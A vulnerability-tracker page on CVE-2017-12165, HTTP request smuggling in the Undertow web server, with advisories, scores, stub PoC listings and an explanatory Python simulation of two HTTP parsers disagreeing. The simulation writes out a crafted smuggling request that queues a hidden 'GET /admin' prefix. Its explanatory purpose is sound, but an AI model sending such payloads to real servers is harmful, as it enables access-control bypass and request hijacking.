CVE-2017-12165

LOW

Undertow <1.4.17, <1.3.31, <2.0.0 - HTTP Request Smuggling


Exploitation Summary

EIP tracks 2 public exploits for CVE-2017-12165. PoCs published by dawetmaster, andikahilmy.

AI-analyzed exploit summary: The repository contains only the source code of Undertow, a Java web server, without any exploit code or technical analysis related to CVE-2017-12165. The README provides no details about the vulnerability or how to exploit it.

Description

Undertow before 1.4.17, 1.3.31 and 2.0.0 accepts HTTP request headers containing unusual whitespace. Because other HTTP parsers in the same request path (for example a reverse proxy in front of Undertow) may interpret such a header differently, the two ends can disagree about where one request stops and the next begins, which makes HTTP request smuggling (CWE-444) possible.
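The following is an added illustration of the CWE-444 class described above, not code from this page, from the PoC repositories, or from Undertow itself. It models three parsing stances for a header block carrying a constructed `Transfer-Encoding : chunked` line (the space before the colon is an assumed example of "unusual whitespace"; the page does not specify which whitespace Undertow accepted): a front-end that forwards the header unrecognised and frames the body by Content-Length, a lenient back-end that strips the whitespace and frames by chunked encoding (the vulnerable behaviour class), and an RFC 7230 section 3.2.4 strict parser that rejects the request with 400. The request bytes and the `simulate` helper are constructed for the example.

```python
"""Constructed illustration of the CWE-444 (HTTP request smuggling) class behind
CVE-2017-12165: two HTTP parsers disagreeing about a header with unusual
whitespace. This is example code, not Undertow's parser, and the exact
whitespace Undertow accepted is an assumption (a space before the colon).
"""
import re

# RFC 7230 section 3.2.6 "token" characters; a field-name must be one token,
# so a trailing SP/HTAB before the colon is not allowed (section 3.2.4).
_TOKEN = re.compile(rb"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")


def parse_headers(block, mode):
    """Parse a CRLF-separated header block into [(lowercased name, value), ...].

    mode "lenient":     strip whitespace around the field-name, so
                        b"Transfer-Encoding : chunked" IS Transfer-Encoding
                        (models the vulnerable behaviour class).
    mode "passthrough": keep the field-name as sent, so the same line is an
                        unknown header (models a front-end that forwards it).
    mode "strict":      RFC 7230 section 3.2.4: reject whitespace between
                        field-name and colon; a server MUST answer 400.
    """
    headers = []
    for line in block.split(b"\r\n"):
        if not line:
            continue
        name, sep, value = line.partition(b":")
        if not sep:
            raise ValueError("header line without a colon: %r" % line)
        if mode == "strict" and not _TOKEN.match(name):
            raise ValueError("invalid field-name: %r" % name)
        if mode == "lenient":
            name = name.strip(b" \t")
        headers.append((name.lower(), value.strip(b" \t")))
    return headers


def read_body(headers, stream):
    """Delimit one message body in `stream`; return (body, remaining bytes).

    RFC 7230 section 3.3.3: a chunked Transfer-Encoding takes precedence over
    Content-Length. Trailers are not handled (none are used in the example).
    """
    te = [v for n, v in headers if n == b"transfer-encoding"]
    if te and b"chunked" in te[-1].lower():
        body, pos = b"", 0
        while True:
            eol = stream.index(b"\r\n", pos)
            size = int(stream[pos:eol].split(b";")[0], 16)  # ignore chunk-ext
            pos = eol + 2
            if size == 0:
                if stream[pos:pos + 2] != b"\r\n":
                    raise ValueError("missing CRLF after last-chunk")
                return body, stream[pos + 2:]
            body += stream[pos:pos + size]
            pos += size + 2  # chunk-data followed by CRLF
    cl = [v for n, v in headers if n == b"content-length"]
    length = int(cl[0].decode("ascii")) if cl else 0
    return stream[:length], stream[length:]


# Constructed CL.TE probe. Content-Length covers the whole body, so a parser
# that does not recognise the oddly spaced Transfer-Encoding header forwards
# everything; a parser that strips the whitespace honours "chunked", stops at
# the zero-size chunk and keeps the rest as the start of the NEXT request.
SMUGGLED_PREFIX = b"GET /admin HTTP/1.1\r\nX-Ignore: "
BODY = b"0\r\n\r\n" + SMUGGLED_PREFIX
REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: victim.example\r\n"
    b"Content-Length: " + str(len(BODY)).encode("ascii") + b"\r\n"
    b"Transfer-Encoding : chunked\r\n"  # note the SP before the colon
    b"\r\n" + BODY
)


def simulate(raw):
    """Frame one request under three parsing stances; return a dict of results."""
    head, _, stream = raw.partition(b"\r\n\r\n")
    _request_line, _, header_block = head.partition(b"\r\n")
    result = {}
    # Front-end proxy: header name not normalised -> framed by Content-Length.
    result["front_end"] = read_body(parse_headers(header_block, "passthrough"), stream)
    # Vulnerable back-end: whitespace stripped -> framed by chunked encoding.
    result["back_end"] = read_body(parse_headers(header_block, "lenient"), stream)
    # Fixed back-end: refuses to parse the ambiguous header at all.
    try:
        parse_headers(header_block, "strict")
        result["strict"] = "accepted"
    except ValueError as exc:
        result["strict"] = "400 Bad Request (%s)" % exc
    return result


if __name__ == "__main__":
    for stance, outcome in simulate(REQUEST).items():
        print(stance, "->", outcome)
```

Running the script shows the desync: the front-end forwards the full body and leaves nothing on the connection, the lenient back-end ends the body at the zero chunk and keeps `GET /admin HTTP/1.1\r\nX-Ignore: ` queued as the prefix of whatever request the proxy sends next, and the strict parser never reaches the framing step. The `X-Ignore: ` tail is the usual trick for swallowing the next request's request line into a header value; the two-parser disagreement, not the specific tail, is what the CVE is about.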

Exploits (2)

nomisec STUB
by dawetmaster · poc
https://github.com/dawetmaster/CVE-2017-12165-undertow-vulnerable

The repository contains only the source code of Undertow, a Java web server, without any exploit code or technical analysis related to CVE-2017-12165. The README provides no details about the vulnerability or how to exploit it.

Classification
Stub 90%
Attack Type
Other
Complexity
Trivial
Reliability
Theoretical
Target: Undertow (version not specified)
No auth needed
Prerequisites: none
Analyzed by devstral-2 on Mar 14, 2026.
nomisec STUB
by andikahilmy · poc
https://github.com/andikahilmy/CVE-2017-12165-undertow-vulnerable

The repository contains a partial snapshot of the Undertow web server source code but lacks any exploit code or technical analysis related to CVE-2017-12165. The README is a generic description of Undertow without vulnerability details.

Classification
Stub 90%
Attack Type
Other
Complexity
Theoretical
Reliability
Theoretical
Target: Undertow (version unspecified)
No auth needed
Analyzed by devstral-2 on Feb 18, 2026.

References (10)

Core References (10)
Vendor Advisory (Red Hat): https://access.redhat.com/errata/RHSA-2018:1322
Vendor Advisory (Red Hat): https://access.redhat.com/errata/RHSA-2018:0002
Vendor Advisory (Red Hat): https://access.redhat.com/errata/RHSA-2017:3458
Vendor Advisory (Red Hat): https://access.redhat.com/errata/RHSA-2018:0004
Issue Tracking, Vendor Advisory (Red Hat Bugzilla): https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-12165
Vendor Advisory (Red Hat): https://access.redhat.com/errata/RHSA-2017:3455
Vendor Advisory (Red Hat): https://access.redhat.com/errata/RHSA-2017:3456
Vendor Advisory (Red Hat): https://access.redhat.com/errata/RHSA-2018:0003
Vendor Advisory (Red Hat): https://access.redhat.com/errata/RHSA-2018:0005
Vendor Advisory (Red Hat): https://access.redhat.com/errata/RHSA-2017:3454

Scores

CVSS v3 2.6
EPSS 0.0110
EPSS Percentile 78.5%
Attack Vector NETWORK
CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N

Details

CWE
CWE-444
Status published
Products (5)
io.undertow/undertow-core 0 - 1.3.31 (Maven)
redhat/jboss_enterprise_application_platform 7.0.0
redhat/jboss_enterprise_application_platform 7.1.0
redhat/undertow 2.0.0 alpha_1
redhat/undertow 1.0.0 - 1.3.31
Published Jul 27, 2018
Tracked Since Feb 18, 2026